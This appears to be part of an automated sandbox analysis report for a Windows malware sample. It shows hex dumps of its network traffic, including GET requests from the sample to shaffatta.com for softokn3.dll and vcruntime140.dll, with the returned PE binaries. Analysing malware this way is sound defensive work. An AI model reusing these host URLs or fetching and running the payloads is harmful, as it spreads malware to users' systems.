                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 10 57 ff d1 83 c4 04 03 05 e4 10 1e 10 a3 e4 10 1e 10 3b 05 0c 11 1e 10 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db
                                                                                                    Data Ascii: W;w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 06 8b 48 1c ff 15 00 40 1e 10 6a 02 56 ff d1 83 c4 08 85 c0 0f 85 42 fd ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31
                                                                                                    Data Ascii: H@jVBD$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 31 ff 89 7c 24 24 89 7c 24 08 0f 57 c0 0f 29 44 24 10 89 7c 24 20 89 54 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85
                                                                                                    Data Ascii: 1|$$|$W)D$|$ T$%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 01 cb 89 5c 24 0c 39 c3 7d 21 8b 5c 24 0c 8d 3c 5b c1 e7 04 83 c7 10 8b 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85
                                                                                                    Data Ascii: \$9}!\$<[Fd8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 01 00 00 eb 58 83 b9 28 01 00 00 00 0f 84 b5 00 00 00 80 79 57 00 74 2d e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d
                                                                                                    Data Ascii: X(yWt-LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 4c 24 40 8b 74 24 14 89 31 89 41 04 0f 95 c3 c1 e3 12 81 cb 04 00 01 00 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8
                                                                                                    Data Ascii: L$@t$1AY`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1
                                                                                                    2024-05-03 09:21:40 UTC16384INData Raw: 24 28 ff d1 83 c4 18 83 f8 01 0f 84 b4 fe ff ff a9 fd ff ff ff 0f 85 e5 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74
                                                                                                    Data Ascii: $(4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9t


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.449750168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:41 UTC93OUTGET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:42 UTC286INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:41 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 257872
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "3ef50-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:42 UTC16098INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: e9 e8 38 8c 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c 8b 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be
                                                                                                    Data Ascii: 8^_[]]}jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: c4 0c 8b 45 08 ff 70 0c ff 70 08 57 e8 2d 9e ff ff 83 c4 0c 8b 45 d4 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40
                                                                                                    Data Ascii: EppW-E@EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: b6 41 01 d1 e8 8a 80 68 f9 02 10 88 41 01 0f b6 41 02 d1 e8 8a 80 68 f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6
                                                                                                    Data Ascii: AhAAhAAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: 24 8d 08 fc 02 10 81 7c 24 24 54 43 53 ce 0f 85 66 08 00 00 8b 43 04 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f
                                                                                                    Data Ascii: $|$$TCSfC0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: c4 04 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 2c 8c 01 00 89 f8 83 c4 10 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8
                                                                                                    Data Ascii: 1M1,^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2P
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: 00 85 c0 0f 84 14 02 00 00 50 e8 ef 58 00 00 83 c4 04 89 45 dc 85 c0 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff
                                                                                                    Data Ascii: PXEtwu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWS
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: e5 b8 51 00 00 00 5d c3 cc cc cc cc cc cc 55 89 e5 53 57 56 8b 7d 10 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe
                                                                                                    Data Ascii: Q]USWV}7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: c3 b8 00 08 00 00 5d c3 b8 00 10 00 00 5d c3 b8 00 20 00 00 5d c3 b8 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c
                                                                                                    Data Ascii: ]] ]@]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!C
                                                                                                    2024-05-03 09:21:42 UTC16384INData Raw: 83 c6 ff 0f 85 d5 fe ff ff eb 12 0f 1f 00 83 ff 11 0f 84 d8 fe ff ff eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96
                                                                                                    Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@W


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.449751168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:43 UTC97OUTGET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1
                                                                                                    Host: shaffatta.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:43 UTC285INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:43 GMT
                                                                                                    Content-Type: application/x-msdos-program
                                                                                                    Content-Length: 80880
                                                                                                    Connection: close
                                                                                                    Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                    ETag: "13bf0-5e7ea271b0900"
                                                                                                    Accept-Ranges: bytes
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:43 UTC16099INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                    2024-05-03 09:21:43 UTC16384INData Raw: 2b f8 75 18 0f b6 7e 01 0f b6 42 01 2b f8 75 0c 0f b6 7e 02 0f b6 42 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f
                                                                                                    Data Ascii: +u~B+u~B+t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3
                                                                                                    2024-05-03 09:21:44 UTC16384INData Raw: 8d 4d f8 e8 ce f7 ff ff 83 3d a8 f2 00 10 01 75 11 83 3d a4 f2 00 10 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19
